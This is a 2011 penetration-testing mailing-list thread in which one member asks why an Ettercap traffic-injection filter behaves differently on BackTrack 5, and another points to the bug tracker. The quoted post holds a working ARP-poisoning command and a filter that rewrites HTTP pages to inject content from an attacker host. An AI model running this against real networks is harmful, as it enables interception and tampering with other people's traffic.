I've not tried to use Ettercap in BT5 as yet.

However you can file BT5 bug reports here;
http://redmine.backtrack-linux.org:8080/

Ryan Dewhurst

blog www.ethicalhack3r.co.uk
projects www.dvwa.co.uk | www.webwordcount.com
twitter www.twitter.com/ethicalhack3r


On Wed, Jun 15, 2011 at 1:13 PM, Joshua Wright <[email protected]> wrote:

> Has anyone successfully used Ettercap with a filter on BT5?
>
> On BT4R2, this script works like a champ:
>
> if (ip.proto == TCP && tcp.dst == 80) {
>   if (search(DATA.data, "If-Modified-Since")) {
>      replace("Accept-Encoding", "If-PACified-Since");
>      msg("Killed If-Modified-Since\n");
>   }
> }
> if (ip.proto == TCP && tcp.src == 80) {
>   replace("img src=", "img src=\"http://10.10.10.70/pwned.jpg\"; ");
>   msg("pwned image injected\n");
> }
>
> # etterfilter -o pwned.ef pwned.filter
> # ettercap -TqM arp:remote -F pwned.ef // //
>
> In testing with BT5 however, I see the logging messages, and the packets
> are injected by Ettercap, but the original frames are not dropped.  I
> validated this on the victim where he gets the original packets
> immediately followed by the Ettercap-modified packets.  The follow-up
> packets are dropped by the victim as TCP retransmissions.
>
> I confirmed this behavior on BT5 VM and booting from a DVD natively.
>
> I'm guessing this is due to something having changed in the kernel from
> BT4R2 to BT5, but I'm not sure what it could be.  I checked
> /sys/net/ipv4/ip_forward, but it is set to 0.  Any other suggestions?
>
> Thanks,
>
> -Josh
> _______________________________________________
> Pauldotcom mailing list
> [email protected]
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
>
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Reply via email to